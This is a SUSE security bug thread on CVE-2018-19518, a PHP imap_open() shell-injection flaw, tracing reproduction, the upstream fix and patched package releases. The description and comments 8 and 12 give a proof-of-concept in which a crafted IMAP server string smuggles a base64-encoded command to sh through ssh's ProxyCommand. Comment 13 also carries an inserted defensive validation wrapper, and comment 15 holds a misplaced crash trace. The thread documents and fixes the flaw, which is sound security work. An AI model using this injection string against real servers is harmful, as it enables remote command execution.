Bug 1117107 - (CVE-2018-19518) VUL-0: CVE-2018-19518: php5,php53,php7: PHP imap_open() script injection
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Priority: P3 - Medium, Severity: Major
Assigned To: Security Team bot
https://smash.suse.de/issue/219595/
CVSSv3:SUSE:CVE-2018-19518:5.3:(AV:L/...
Reported: 2018-11-23 08:44 UTC by Andreas Stieger
Modified: 2019-07-04 06:28 UTC (History)
Found By: Security Response Team
Description Andreas Stieger 2018-11-23 08:44:08 UTC
It was reported that PHP is vulnerable to a shell injection via imap_open() and ssh. PHP installations with IMAP enabled would be affected, either via applications accepting user-supplied IMAP servers or running untrusted code, or other vectors.

PoC:

<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

References:
https://seclists.org/oss-sec/2018/q4/164
https://antichat.com/threads/463395/#post-4254681
https://github.com/Bo0oM/PHP_imap_open_exploit
Comment 1 Marcus Meissner 2018-11-23 09:37:38 UTC
QA REPRODUCER:

see comment 0
Comment 2 Marcus Meissner 2018-11-23 12:23:37 UTC
php7 on sle15 does not build the imap module apparently.
Comment 3 Marcus Meissner 2018-11-23 12:33:46 UTC
https://secure.php.net/manual/en/function.imap-open.php

 Passing untrusted data to this parameter is insecure, unless imap.enable_insecure_rsh is disabled.
Comment 4 Marcus Meissner 2018-11-23 12:35:05 UTC
I did not know this would call external shell commands and not just do imap internally :(
Comment 5 Marcus Meissner 2018-11-23 13:02:03 UTC
the above guidance seems new .. and it is quite fresh: 

imap.enable_insecure_rsh | default "0" | PHP_INI_SYSTEM | Available as of PHP 7.1.25, 7.2.13 and 7.3.0. Formerly, it was implicitly enabled.
Comment 6 Marcus Meissner 2018-11-23 13:04:46 UTC
I think this guidance comes from exactly this bugreport. It was added only days ago:


commit d4797f836e9bea6f0ffa1908a2ea5a3f258adc65
Author: Stanislav Malyshev <stas@php.net>
Date:   Sun Nov 18 17:10:43 2018 -0800

    Disable rsh/ssh functionality in imap by default (bug #77153)
Comment 7 Marcus Meissner 2018-11-23 13:05:30 UTC
https://bugs.php.net/bug.php?id=77153
Comment 8 Petr Gajdos 2018-11-23 14:00:43 UTC
http://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb

However, I cannot reproduce via the testcase for 12/php7, 12/php5, 11sp3/php53 and 11/php5 with imap extension installed. What am I doing wrong?

$ cat test.php
<?php
$payload = "echo 'BUG'> " . __DIR__ . '/__bug';
$payloadb64 = base64_encode($payload);
$server = "x -oProxyCommand=echo\t$payloadb64|base64\t-d|sh}";
@imap_open('{'.$server.':143/imap}INBOX', '', '');
// clean
imap_errors();
var_dump(file_exists(__DIR__ . '/__bug'));
?>
# php test.php
bool(false)
$ ls __bug
ls: cannot access __bug: No such file or directory
$

Something else has to be set up?
Comment 9 Petr Gajdos 2018-11-23 14:55:59 UTC
Packages submitted, but completely untested.
Comment 11 Petr Gajdos 2018-11-27 07:42:43 UTC
Okay, I can reproduce it via linking rsh to ssh, cf. description of https://bugs.php.net/bug.php?id=76428
Comment 12 Petr Gajdos 2018-11-27 09:23:28 UTC
How to reproduce (just note that __DIR__ does not work for 11/php5):

install openssh, php, php-imap
link /usr/bin/ssh to /usr/bin/rsh
create test.php:
<?php
$payload = "echo 'BUG'> " . __DIR__ . '/__bug';
$payloadb64 = base64_encode($payload);
$server = "x -oProxyCommand=echo\t$payloadb64|base64\t-d|sh}";
@imap_open('{'.$server.':143/imap}INBOX', '', '');
// clean
imap_errors();
var_dump(file_exists(__DIR__ . '/__bug'));
?>

$ php test.php; rm __bug
bool(true)
$

Even if this testcase does not work for us, I guess it is a good idea to have this {r,s}sh functionality disabled by default and be able to turn on the functionality again.
Comment 13 Petr Gajdos 2018-11-27 09:25:06 UTC
AFTER

With the same setup (openssh installed, link rsh to ssh):

$ php test.php
bool(false)
$ echo 'imap.enable_insecure_rsh=1' >> /etc/php7/conf.d/imap.ini
$ php test.php; rm __bug
bool(true)
$
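A defensive wrapper for applications that must accept a user-supplied IMAP host, added here as an example and not part of this bug report, of the PHP project or of the reproducer above: it validates the host against a hostname/IPv4 pattern before building the mailbox string and refuses to connect unless imap.enable_insecure_rsh is disabled. The function names safe_imap_mailbox, insecure_rsh_disabled and safe_imap_open are hypothetical.

```php
<?php
// Added example, not code from the bug report or from PHP. Function names are hypothetical.

function safe_imap_mailbox(string $host, int $port = 993, string $folder = 'INBOX'): string
{
    // Only a plain hostname or IPv4 literal is accepted. Whitespace, tabs, braces and a
    // leading dash are exactly what turns the host into rsh/ssh arguments (CVE-2018-19518).
    $isHost = (bool) preg_match('/^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$/D', $host);
    $isIp   = filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false;
    if (!$isHost && !$isIp) {
        throw new InvalidArgumentException('Rejected IMAP host: ' . var_export($host, true));
    }
    if ($port < 1 || $port > 65535) {
        throw new InvalidArgumentException("Rejected IMAP port: $port");
    }
    // The folder is a mailbox name on the server; keep it free of braces and control characters.
    if (!preg_match('/^[A-Za-z0-9._\/-]+$/D', $folder)) {
        throw new InvalidArgumentException('Rejected IMAP folder name');
    }
    return sprintf('{%s:%d/imap/ssl}%s', $host, $port, $folder);
}

function insecure_rsh_disabled(): bool
{
    // ini_get() returns false when the directive does not exist, i.e. on PHP releases
    // before 7.1.25 / 7.2.13 / 7.3.0, where rsh/ssh fallback was always enabled.
    $value = ini_get('imap.enable_insecure_rsh');
    return $value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN) === false;
}

function safe_imap_open(string $host, string $user, string $pass)
{
    if (!function_exists('imap_open')) {
        throw new RuntimeException('php-imap extension not loaded');
    }
    if (!insecure_rsh_disabled()) {
        throw new RuntimeException('imap.enable_insecure_rsh is not disabled; refusing to connect');
    }
    return imap_open(safe_imap_mailbox($host), $user, $pass);
}

// Constructed inputs: a PoC-style host from this report must be rejected, a plain host accepted.
try {
    safe_imap_mailbox("x -oProxyCommand=echo\tZWNobw==|base64\t-d|sh}");
    echo "BUG: PoC-style host accepted\n";
} catch (InvalidArgumentException $e) {
    echo 'Rejected as expected: ' . $e->getMessage() . "\n";
}
echo safe_imap_mailbox('imap.example.com'), "\n";
```

Host validation is the primary control; the ini check is belt-and-braces for builds where the directive exists, since an older php-imap without it cannot be made safe by configuration.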
Comment 14 Petr Gajdos 2018-11-27 09:29:30 UTC
I think I am done here.
Comment 15 Petr Gajdos 2018-11-30 14:57:22 UTC
with exrmaketiled

#0  0x00007ffff7ab80bc in Imf_2_3::(anonymous namespace)::bufferedReadPixels (ifd=0x5555555ce280, scanLine1=-858993460, 
    scanLine2=-858993460) at ImfInputFile.cpp:331
#1  0x00007ffff7aba317 in Imf_2_3::InputFile::readPixels (this=0x5555555cdd90, scanLine1=-858993460, scanLine2=-858993460)
    at ImfInputFile.cpp:811
#2  0x00007ffff7b55edb in Imf_2_3::InputPart::readPixels (this=0x7fffffffe358, scanLine1=-858993460, scanLine2=-858993460)
    at ImfInputPart.cpp:92
#3  0x0000555555566c73 in makeTiled (inFileName=0x7fffffffeb6d "id:000131,sig:11,src:000514+002831,op:splice,rep:16", 
    outFileName=0x7fffffffeba1 "out", partnum=0, mode=Imf_2_3::ONE_LEVEL, roundingMode=Imf_2_3::ROUND_DOWN, 
    compression=Imf_2_3::ZIP_COMPRESSION, tileSizeX=64, tileSizeY=64, doNotFilter=std::set with 0 elements, extX=CLAMP, extY=CLAMP, 
    verbose=false) at makeTiled.cpp:572
#4  0x00005555555617dd in main (argc=3, argv=0x7fffffffe828) at main.cpp:421
Comment 16 Petr Gajdos 2018-12-03 09:09:18 UTC
(In reply to Petr Gajdos from comment #15)
> with exrmaketiled
> 
> #0  0x00007ffff7ab80bc in Imf_2_3::(anonymous namespace)::bufferedReadPixels
> (ifd=0x5555555ce280, scanLine1=-858993460, 
>     scanLine2=-858993460) at ImfInputFile.cpp:331
> #1  0x00007ffff7aba317 in Imf_2_3::InputFile::readPixels
> (this=0x5555555cdd90, scanLine1=-858993460, scanLine2=-858993460)
>     at ImfInputFile.cpp:811
> #2  0x00007ffff7b55edb in Imf_2_3::InputPart::readPixels
> (this=0x7fffffffe358, scanLine1=-858993460, scanLine2=-858993460)
>     at ImfInputPart.cpp:92
> #3  0x0000555555566c73 in makeTiled (inFileName=0x7fffffffeb6d
> "id:000131,sig:11,src:000514+002831,op:splice,rep:16", 
>     outFileName=0x7fffffffeba1 "out", partnum=0, mode=Imf_2_3::ONE_LEVEL,
> roundingMode=Imf_2_3::ROUND_DOWN, 
>     compression=Imf_2_3::ZIP_COMPRESSION, tileSizeX=64, tileSizeY=64,
> doNotFilter=std::set with 0 elements, extX=CLAMP, extY=CLAMP, 
>     verbose=false) at makeTiled.cpp:572
> #4  0x00005555555617dd in main (argc=3, argv=0x7fffffffe828) at main.cpp:421

ETOMANYSECURITYBUGS, this of course does not belong here.
Comment 17 Swamp Workflow Management 2018-12-05 17:11:09 UTC
SUSE-SU-2018:3986-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    php53-5.3.17-112.45.1
SUSE Linux Enterprise Server 11-SP4 (src):    php53-5.3.17-112.45.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    php53-5.3.17-112.45.1
Comment 18 Swamp Workflow Management 2018-12-05 17:13:29 UTC
SUSE-SU-2018:3988-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    php7-7.0.7-50.56.2
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    php7-7.0.7-50.56.2
SUSE Linux Enterprise Module for Web Scripting 12 (src):    php7-7.0.7-50.56.2
Comment 19 Swamp Workflow Management 2018-12-06 14:10:15 UTC
SUSE-SU-2018:3995-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    php5-5.5.14-109.45.2
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    php5-5.5.14-109.45.2
SUSE Linux Enterprise Module for Web Scripting 12 (src):    php5-5.5.14-109.45.2
Comment 20 Swamp Workflow Management 2018-12-07 23:11:29 UTC
openSUSE-SU-2018:4030-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
openSUSE Leap 42.3 (src):    php7-7.0.7-52.1
Comment 21 Swamp Workflow Management 2018-12-07 23:19:33 UTC
openSUSE-SU-2018:4038-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
openSUSE Leap 42.3 (src):    php5-5.5.14-109.1
Comment 22 Swamp Workflow Management 2018-12-11 10:30:30 UTC
An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2018-12-18.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/64182
Comment 27 Marcus Meissner 2019-07-04 06:28:52 UTC
released